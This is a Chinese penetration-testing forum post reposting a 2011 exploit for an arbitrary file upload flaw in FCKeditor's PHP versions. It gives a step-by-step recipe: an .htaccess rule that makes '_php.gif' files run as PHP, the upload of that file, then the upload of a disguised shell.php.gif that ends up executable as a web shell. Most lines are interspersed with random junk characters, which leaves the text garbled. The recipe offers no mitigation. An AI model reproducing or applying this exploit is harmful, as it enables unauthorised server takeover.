中国网络渗透测试联盟

标题: FCKeditor所有php版本Upload上传漏洞 [打印本页]
作者: admin    时间: 2013-10-27 17:25
标题: FCKeditor所有php版本Upload上传漏洞
FCKeditor所有php版本Upload上传漏洞. w% n: ?! w- w
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:074 U& Z5 O1 V' X4 C/ V# d
减小字体 增大字体
3 N6 t# n1 c- P[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability' N7 N5 J+ _7 P8 i, Q9 @7 T) S9 r# @' H2 a
[+] Date: 2011$ X, y" j0 |8 w3 V/ w- `
[+] Author : sinesafe.cn4 d# p5 {! c: H* f8 K1 K0 b
[+] Website : WwW.sinesafe.cn, P. C& \  E+ A" E) L3 @1 k/ }! ^
———————————————————
0 w# e; j: c  Y0 z+ _9 n) U7 B1.create a htaccess file:
9 A  j: \) k- R5 _# Dcode:8 b1 b* \: {5 u$ z, h/ Z
<FilesMatch “_php.gif”>$ S( i9 a, W; I- g3 I9 o+ `1 |
SetHandler application/x-httpd-php
9 d& f  b& I) r$ y: S8 u7 Z$ x+ Z</FilesMatch>2 A/ L3 l' n+ `0 }% v2 W

: w  H/ q  b3 M2.Now upload this htaccess with FCKeditor.' O5 Z. \1 {+ T/ T

( B4 E2 c5 y; p( R# }, Lhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
. d! ]+ f+ d/ c8 b8 `  ]2 E. ~2 [' j5 P  `! c: C! I
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html& |9 C7 ?' H( c7 w; V0 S4 @
* `0 z. q. g7 E
———————————————————————————————-
& n8 g1 o' h5 Z! e! R6 x+ L; u3.Now upload shell.php.gif with FCKeditor.
) @! q# m, d& r; ]/ G0 p4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically." g+ y% q& q4 }2 n( o( ?' K% _
5.http://www.sinesafe.cn/anything/shell_php.gif1 Z. r! U) x1 B
6.Now shell is available from server.

2 |+ G7 v2 i; ]) m7 w+ K! r- ]1 v% y' V/ N( s. e% t
7 Y* @$ S4 ^; U. S




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2